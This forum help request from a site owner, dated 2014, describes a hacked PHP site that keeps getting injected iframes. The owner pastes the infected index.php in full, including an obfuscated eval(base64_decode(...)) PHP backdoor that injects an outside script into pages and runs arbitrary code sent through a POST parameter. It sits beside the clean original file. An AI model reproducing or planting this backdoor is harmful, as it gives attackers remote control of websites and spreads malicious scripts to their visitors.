Somebody hacked into my site and changed coding >>> URGENT HELP NEEDED <<<

Posted on 16th Feb 2014 by admin

I am not that much into programming , but somebody is hacking to my site and injecting some kind of iframes ... it happened to another site , but that wasn't that important for me, but now it has happened to one of my major site not sure what is going on. Need some immediate help

I see this code



QuoteFatal error: Cannot redeclare flq() (previously declared in /home/articles/public_html/lib/functions.compat.php(1) : eval()'d code:1) in /home/articles/public_html/lib/functions.date.php(1) : eval()'d code on line 1

This is the infected index home page file now

Quote<?php eval(base64_decode('aWYoIWlzc2V0KCRmbHExKSl7ZnVuY3Rpb24gZmxxKCRzKXtpZ ihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkZuWVdjME5DNWpiMjB2ZG1JdllYSmtiaTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIGZscTIoJGEsJGIsJGMsJGQpe2dsb2JhbCAkZmxxMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkZmxxMSkpY2FsbF91c2VyX2Z1bmMoJGZscTEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSkgYXMgJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZmxxJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2ZscScpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRmbHFsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdmbHEyJykpIT0nZmxxMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?><?php


include("init.php");
$GLOBALS["AL_CLASS_INDEX"] = &GetClass('index');
$GLOBALS["AL_CLASS_INDEX"]->HandlePage();


?>

This was the original index



Quote<?php


include("init.php");
$GLOBALS["AL_CLASS_INDEX"] = &GetClass('index');
$GLOBALS["AL_CLASS_INDEX"]->HandlePage();


?>

when I try to replace it agin gives some error it happened a day before , when I replace the index from backup it worked , but today its not working, need some help immediatly .. thanks